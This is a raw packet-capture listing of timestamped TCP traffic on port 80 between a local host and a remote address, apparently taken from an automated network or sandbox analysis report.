                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.190195084 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.190234900 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.191278934 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.191334963 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.191416025 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.191454887 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.192276955 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.192682028 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.192711115 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.192765951 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.193356991 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.193458080 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.194449902 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.194462061 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.194498062 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.194516897 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.194685936 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.194808960 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.195503950 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.195544004 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.196083069 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.196177959 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.196607113 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.196645021 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.196862936 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.196904898 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.197702885 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.197824001 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.197861910 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.198755980 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.198797941 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.199493885 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.199615955 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.199834108 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.199873924 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.200216055 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.200253963 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.200946093 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.200990915 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.201236963 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.201280117 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.201977968 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.202095032 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.202258110 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.202306032 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.203082085 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.203273058 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.203299999 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.203315973 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.204165936 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.204219103 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.204375982 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.204442978 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.205291986 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.205337048 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.205943108 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.205986023 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.206461906 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.206507921 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.206535101 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.206682920 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.207456112 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.207493067 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.207705975 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.207746983 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.208477974 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.208513975 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.208671093 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.208714008 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.209614038 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.209701061 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.209969997 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.210005045 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.210808992 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.210850000 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.210966110 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.211119890 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.211889982 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.212106943 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.212138891 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.212790966 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.213087082 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.213112116 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.213157892 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.213900089 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.213943958 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.214104891 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.214144945 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.214984894 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.215027094 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.215094090 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.215128899 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.216082096 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.216136932 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.216526031 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.216587067 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.217140913 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.217176914 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.217386007 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.217426062 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.218276978 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.218312979 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.218486071 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.218523979 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.219341040 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.219384909 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.219408989 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.219455957 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.308168888 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.355581045 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.355670929 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.355757952 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.355859995 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.356024981 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.356069088 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.356986046 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.357037067 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.357086897 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.358134031 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.358181953 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.358927011 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.359183073 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.359194040 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.359235048 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.360397100 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.360718012 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.360769987 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.361287117 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.361754894 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.361826897 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.362376928 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.362735033 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.362781048 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.363475084 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.363570929 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.364500046 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.364557028 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.364660025 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.364672899 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.364712954 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.365777016 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.365818977 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.365933895 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.365974903 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.366755009 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.366794109 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.367034912 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.367074966 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.367831945 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.367984056 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.368021965 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.368890047 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.368926048 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.369388103 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.369431973 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.370018959 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.370065928 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.370413065 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.370457888 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.371028900 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.371073961 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.371422052 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.371577978 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.372139931 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.372181892 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.372697115 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.372740984 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.373307943 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.373344898 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.373414993 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.373454094 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.374342918 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.374420881 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.374952078 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.374994993 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.375472069 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.375511885 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.376002073 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.376040936 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.376415014 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.376456976 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.376800060 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.376837015 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.377506971 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.377547979 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.377656937 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.377701044 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.378612041 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.378652096 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.378912926 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.378952026 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.379694939 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.379739046 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.379861116 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.379903078 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.380805969 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.381000042 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.381079912 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.381118059 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.381925106 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.381994963 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.382139921 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.382178068 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.382934093 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.383101940 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.383105040 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.383132935 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.384205103 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.384252071 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.384424925 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.384466887 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.385201931 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.385237932 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.385685921 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.385831118 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.386220932 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.386261940 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.386339903 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.386382103 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.387300968 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.387475014 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.387610912 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.387649059 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.388350964 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.388391972 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.388504982 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.388642073 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.389555931 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.389599085 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.389938116 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.389976978 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.390573978 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.390625954 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.390767097 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.390821934 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.391625881 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.391673088 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.391705036 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.391741991 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.392748117 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.392793894 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.393014908 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.393054962 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.393798113 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.394063950 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.394112110 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.394975901 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.395045042 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.395592928 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.395638943 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.395946980 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.396050930 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.396071911 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.396117926 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.397031069 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.397073030 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.397172928 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.397212029 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.398219109 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.398314953 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.398400068 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.398442984 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.399161100 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.399282932 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.399350882 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.399389982 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.400373936 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.400496006 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.400532961 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.400573969 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.401365995 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.401405096 CET4996980192.168.2.6185.215.113.16
